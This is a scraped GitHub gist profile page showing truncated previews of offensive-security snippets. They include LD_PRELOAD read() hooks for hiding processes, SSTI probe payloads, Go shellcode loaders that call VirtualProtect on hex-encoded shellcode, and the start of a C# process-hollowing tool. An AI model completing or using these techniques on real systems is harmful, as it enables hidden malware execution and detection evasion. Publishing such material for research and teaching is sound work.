Skip to content

Instantly share code, notes, and snippets.

View affix's full-sized avatar
:shipit:
Code never lies, Comments might though

Keiran Smith affix

:shipit:
Code never lies, Comments might though
View GitHub Profile
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <dlfcn.h>
#define PROC_NAME "pipewire"
ssize_t read(int fd, void *buf, size_t count) {
ssize_t (*orig_read)(int fd, void *buf, size_t count);
ssize_t result;
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <dlfcn.h>
ssize_t read(int fd, void *buf, size_t count) {
ssize_t (*orig_read)(int fd, void *buf, size_t count);
ssize_t result;
orig_read = dlsym(RTLD_NEXT, "read");
@affix
affix / hookingread.c
Created October 10, 2022 08:26
Hooking Read from my tutorial on process hiding, part 1
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
ssize_t read(int fd, void *buf, size_t count) {
return 0;
}
@affix
affix / github-auto-sso.user.js
Last active February 22, 2022 10:33
A greesemonkey/tampermonkey/*monkey script to automatically login to github orgs using SSO
// ==UserScript==
// @name Github Auto SSO
// @namespace Violentmonkey Scripts
// @match https://github.com/*
// @grant none
// @version 1.0.1
// @author Keiran Smith <opensource@keiran.scot>
// @description 26/07/2021, 09:05:17
// ==/UserScript==
@affix
affix / SSTI Payloads
Last active September 17, 2021 11:06
<xss>
<attack>
<name>0</name>
<code>{{2*2}}[[3*3]]</code>
</attack>
<attack>
<name>1</name>
<code>{{3*3}}</code>
</attack>
<attack>
package main
import (
"encoding/hex"
"fmt"
"syscall"
"unsafe"
)
var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")
package main
import (
"encoding/hex"
"fmt"
"syscall"
"unsafe"
)
var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")
package main
import (
"encoding/hex"
"fmt"
"syscall"
"unsafe"
)
var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")
package main
import (
"encoding/hex"
"fmt"
)
func main() {
sc, err := hex.DecodeString("fc4883e4f0e8c000000041...")
@affix
affix / ProcessHollow.cs
Created March 9, 2021 22:21
Process Hollowing Technique using C#
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Threading;
using System.Text;
using System.Threading.Tasks;
namespace hollow
{